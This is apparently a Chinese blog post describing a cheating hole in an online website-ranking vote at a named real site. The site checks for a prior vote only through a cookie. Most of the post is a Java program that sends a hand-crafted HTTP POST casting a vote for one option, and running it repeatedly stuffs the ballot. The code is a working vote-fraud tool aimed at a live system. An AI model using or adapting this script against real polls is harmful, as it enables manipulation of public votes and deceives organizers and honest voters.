IT两会网站排名投票漏洞
/**
作者: 慈勤强
Email :[email protected]
Http://blog.csdn.net/cqq
*/
刚才上某个网站,看到一条公告,说是IT两会正在举行一个大网站投票的活动,
希望大家都去投他们一票。于是上去看了看,地址是:http://itlianghui.ccw.com.cn/,
下面有个互联网风云榜,就在那里投票。
不过,这个投票过于简单,很容易作弊。
他们是简单的采用Cookie来存储状态的,如果投过票了,就把已经投票状态保存
在Cookie中,当再次投票的时候,就从Cookie取值,具体为 Cookie: VOTEIT_Gray=1。
所以,知道了这些,我们就很容易作弊了,方法就很多了,比如,我们在IE浏览器
工具-->Internet选项-->隐私 里面把设置调到最高,使Cookie 失效,这样的话,你每次
投票就可以了。 或者,写个小程序也可以, 下面是我用Java写的,仅供参考。
import java.io.*;
import java.net.*;
public class CCW
{
public static void main(String args[])
{
try
{
String hostname = "itlianghui.ccw.com.cn";
int port = 80;
InetAddress addr = InetAddress.getByName(hostname);
Socket socket = new Socket(addr, port); //建立一个Socket
//发送命令
BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream(), "UTF8"));
wr.write("POST /program/?m=Vote1&a=Voteit HTTP/1.1\r\n");
wr.write("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*\r\n");
wr.write("Referer: http://itlianghui.ccw.com.cn/\r\n");
wr.write("Accept-Language: zh-cnv\r\n");
wr.write("Content-Type: application/x-www-form-urlencoded\r\n");
wr.write("Accept-Encoding: gzip, deflate\r\n");
wr.write("User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)\r\n");
wr.write("Host:" + hostname + "\r\n");
wr.write("Content-Length: 37\r\n");
wr.write("Connection: Keep-Alive\r\n");
wr.write("Cache-Control: no-cache\r\n\r\n");
wr.write("NAME=Gray&OPTION%5B%5D=1066&x=22&y=18\r\n");
wr.write("\r\n");
wr.flush();
BufferedReader rd = new BufferedReader(new InputStreamReader(socket.getInputStream()));
String line;
line = rd.readLine();
wr.close();
rd.close();
socket.close();
}
catch (Exception e)
{
System.out.println(e.toString());
}
}
} 
|
本类阅读TOP10